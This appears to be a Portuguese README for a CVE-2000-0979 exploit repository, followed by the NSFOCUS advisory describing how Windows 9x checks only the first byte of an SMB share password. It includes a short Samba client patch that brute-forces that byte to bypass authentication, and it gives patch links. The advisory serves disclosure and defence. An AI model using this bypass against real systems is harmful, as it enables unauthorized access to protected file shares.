
CVE-2000-0979
CVE-2000-0979.rb é a ferramenta autônoma para explorar CVE-2000-0979 contra o serviço SMB do Windows 95.
msf_2000_0979.rb é o módulo do Metasploit. Você pode copiá-lo para metasploit-framework ▸ modules ▸ auxiliary ▸ scanner ▸ smb

Mais documentação em breve!
NSFOCUS Security Advisory(SA2000-05)
Tópico: Vulnerabilidade na verificação de senha do protocolo NETBIOS do Microsoft Windows 9x
Data de lançamento: 24 de agosto de 2000 Data de atualização: 11 de outubro de 2000
Existe uma vulnerabilidade no esquema de verificação de senha utilizado pela implementação do protocolo NETBIOS do Microsoft Windows 9x. Essa vulnerabilidade permitirá que qualquer usuário acesse o serviço de compartilhamento de arquivos do Windows 9x protegido por senha. O atacante não precisa saber a senha do compartilhamento.
Você pode definir uma senha para proteger os recursos compartilhados do sistema Microsoft Windows 9x. Mas existe uma vulnerabilidade no esquema de verificação de senha utilizado pela implementação do protocolo NETBIOS do Microsoft Windows 9x. Para verificar a senha, o comprimento da senha depende do comprimento dos dados enviados do cliente para o servidor. Ou seja, se um cliente definir o comprimento da senha como um byte e enviar o pacote com a senha em texto simples para o servidor, o servidor irá comparar apenas com o primeiro byte da senha do compartilhamento (texto simples) e, se forem consistentes, o processo de verificação estará concluído. Tudo o que um atacante precisa fazer é adivinhar e testar o primeiro byte da senha na vítima. O sistema de gerenciamento remoto do Windows 9x também é afetado, pois adota o mesmo método de autenticação de senha compartilhada.
Aqui está um exemplo simples para demonstrar esse bug. Obtenha o pacote de código-fonte do samba e modifique source/client/client.c assim:
--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve
DEBUG(4,(" session setup ok\n"));
+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));
DEBUG(4,(" tconx ok\n"));
Feche o serviço de compartilhamento de arquivos e impressoras da Microsoft.
A Microsoft foi informada e lançou um boletim de segurança sobre essa falha.
O boletim está disponível em:
http://www.microsoft.com/technet/security/bulletin/MS00-072.asp
As correções estão disponíveis em:
. Microsoft Windows 95
Correção disponível em breve
. Microsoft Windows 98 e 98 Second Edition
http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE
. Microsoft Windows Me
http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE
AS INFORMAÇÕES FORNECIDAS SÃO DIVULGADAS PELA NSFOCUS "AS IS", SEM GARANTIA DE QUALQUER TIPO. A NSFOCUS SE ISENTA DE TODAS AS GARANTIAS, EXPRESSAS OU IMPLÍCITAS, EXCETO AS GARANTIAS DE COMERCIABILIDADE. EM NENHUM CASO A NSFOCUS SERÁ RESPONSÁVEL POR QUAISQUER DANOS, INCLUINDO DANOS DIRETOS, INDIRETOS, INCIDENTAIS, CONSEQUENCIAIS, PERDA DE LUCROS COMERCIAIS OU DANOS ESPECIAIS, MESMO QUE A NSFOCUS TENHA SIDO AVISADA DA POSSIBILIDADE DE TAIS DANOS. A DISTRIBUIÇÃO OU REPRODUÇÃO DAS INFORMAÇÕES É PERMITIDA DESDE QUE O ADVISORY NÃO SEJA MODIFICADO DE NENHUMA FORMA.
?Direitos autorais 1999-2000 NSFOCUS. Todos os direitos reservados. Termos de uso.
Equipe de Segurança da NSFOCUS [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)